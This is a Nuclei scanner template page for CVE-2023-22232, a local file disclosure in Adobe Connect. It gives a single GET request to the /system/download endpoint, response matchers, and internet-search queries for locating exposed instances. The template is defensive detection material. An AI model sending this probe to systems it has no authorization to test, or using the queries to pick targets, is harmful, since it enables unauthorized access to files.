Skip to content
Nuclei Templates

Adobe Connect < 12.1.5 - Local File Disclosure

ID: CVE-2023-22232

Severity: medium

Author: 0xr2r

Tags: packetstorm,cve2023,cve,adobe,lfd,download

Description

Section titled “Description”

Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction

YAML Source

Section titled “YAML Source”
id: CVE-2023-22232


info:
  name: Adobe Connect < 12.1.5 - Local File Disclosure
  author: 0xr2r
  severity: medium
  description: |
    Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction
  reference:
    - https://helpx.adobe.com/security/products/connect/apsb23-05.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22232
    - http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-22232
    cwe-id: CWE-284,NVD-CWE-noinfo
    epss-score: 0.12731
    epss-percentile: 0.95463
    cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: connect
    shodan-query:
      - title:"Adobe Connect"
      - http.title:"openvpn connect"
    fofa-query: title="openvpn connect"
    google-query: intitle:"openvpn connect"
  tags: packetstorm,cve2023,cve,adobe,lfd,download


http:
  - method: GET
    path:
      - "{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Save to My Computer"
          - "exam.pdf"
          - "Click to Download"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a0047304502202fefb96372702e82428fbfc490e54e097f1f77e883ad73b567c26b7db33b2bb6022100b4a3999d977ac2093219179d28e7e839ed80ee38eeec314564f5ce0e24dc0eee:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22232.yaml"

View on Github